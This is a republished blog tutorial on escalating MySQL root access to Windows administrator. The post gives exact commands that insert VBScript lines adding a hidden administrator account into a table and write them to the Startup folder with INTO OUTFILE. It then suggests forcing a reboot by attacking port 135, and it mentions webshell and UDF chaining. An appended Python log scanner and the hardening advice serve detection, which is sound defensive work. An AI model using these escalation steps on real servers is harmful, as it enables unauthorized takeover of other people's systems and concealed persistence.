Root User Privilege Escalation: mysql write startup Item Privilege Escalation

Source: Internet
Author: User

From: Pesticide blog

In practice, this can be combined with a UDF DLL privilege escalation from a webshell: use the webshell's file-upload function to upload a file to the Startup directory, then use its shutdown function to restart the system. (I have not succeeded with this yet; I will test it locally when I have the chance, and am recording it here first.) On an English-language system, the Startup directory is "C:\Documents and Settings\All Users\Start Menu\Programs\Startup".

1. Connect to the other party's MySQL server.
mysql -u root -h 192.168.0.1
mysql.exe is in the BIN directory of your MySQL installation.
2. Let's take a look at the databases on the server.
mysql> show databases;
By default, the mysql and test databases are present. Any other databases you see were created by users.
3. Let's enter a database.
mysql> use test;
We are now in the test database.
4. Check the tables in the database.
mysql> show tables;
By default, test contains no tables.
The following are the key steps:
5. Create a new table in the test database.
mysql> create table a (cmd text);
We have now created a table named a with a single field, named cmd, of type text.
6. Insert content into the table.
mysql> insert into a values ("set wshshell = createobject(""wscript.shell"")");
mysql> insert into a values ("a = wshshell.run(""cmd.exe /c net user qwer!@#$1234 /add"", 0)");
mysql> insert into a values ("b = wshshell.run(""cmd.exe /c net localgroup Administrators qwer /add"", 0)");
Note that the double quotation marks, the parentheses, and the trailing "0" must all be entered exactly! These three rows make up a VBS script.
7. Now let's look at what table a contains.
mysql> select * from a;
We should see three rows of data in the table, that is, the content we just entered. After confirming that what you entered is correct, proceed to the next step.
8. Output the table as a VBS script file.
mysql> select * from a into outfile "c:\\docume~1\\alluse~1\\Start Menu\\Programs\\Startup\\a.vbs";
This writes the content of our table into the Startup group as a VBS script file. Note the backslashes: in a MySQL string literal a single backslash is an escape character, so each backslash in the path is doubled.
9. You might ask why MySQL is used to output a VBS file rather than a BAT file. A BAT file pops up an obvious DOS window at startup, whereas the VBS script runs with its window completely hidden and no error prompt! The script was supposed to delete itself after completing, but it could not handle the Chinese directory name. Okay. Find a tool to attack port 135 and restart the server; in a few minutes you will be the administrator.
The test is successful.
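As an added defensive example, not part of the original post: the following Python, written for this page, scans MySQL general-query-log lines for INTO OUTFILE / INTO DUMPFILE writes and flags any aimed at a Windows startup folder or outside the server's secure_file_priv directory. The log lines and the secure_file_priv value are constructed samples.

```python
import re
from typing import Optional

# Constructed general-query-log excerpt (not real traffic); the last line
# mirrors the startup-folder write described in the post above.
SAMPLE_LOG = r"""
2024-01-01T10:00:01Z  12 Query  show databases
2024-01-01T10:00:05Z  12 Query  create table a (cmd text)
2024-01-01T10:00:09Z  12 Query  select * from a into outfile '/var/lib/mysql-files/report.csv'
2024-01-01T10:00:12Z  12 Query  select * from a into outfile "c:\\docume~1\\alluse~1\\Start Menu\\Programs\\Startup\\a.vbs"
"""

# Path fragments of directories whose contents run automatically at logon/boot.
STARTUP_MARKERS = ("\\start menu\\programs\\startup", "\\startup\\", "/startup/")

# Matches INTO OUTFILE / INTO DUMPFILE with a single- or double-quoted target path.
FILE_WRITE_RE = re.compile(r"into\s+(outfile|dumpfile)\s+(['\"])(.*?)\2", re.IGNORECASE)


def classify(query: str, secure_file_priv: Optional[str]) -> Optional[str]:
    """Return a severity label if the query writes a file, otherwise None."""
    m = FILE_WRITE_RE.search(query)
    if not m:
        return None
    # Collapse escaped backslashes so the path compares like a filesystem path.
    path = m.group(3).replace("\\\\", "\\").lower()
    if any(marker in path for marker in STARTUP_MARKERS):
        return "critical: file write into a startup folder"
    # Empty/None secure_file_priv means the server allows writes anywhere.
    if not secure_file_priv or not path.startswith(secure_file_priv.lower()):
        return "high: file write outside secure_file_priv"
    return "info: file write inside secure_file_priv"


def scan_log(text: str, secure_file_priv: Optional[str]) -> list[tuple[str, str]]:
    """Return (label, query) for every file-writing query in general-log text."""
    findings = []
    for line in text.splitlines():
        # General log layout: timestamp, thread id, command type, argument.
        parts = line.split(None, 3)
        if len(parts) < 4 or parts[2] != "Query":
            continue
        label = classify(parts[3], secure_file_priv)
        if label:
            findings.append((label, parts[3]))
    return findings
```

The general log must be enabled for this to see anything; the same check applies to audit-plugin output, and the underlying fix is to revoke the FILE privilege from application accounts and set secure_file_priv to a dedicated directory.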
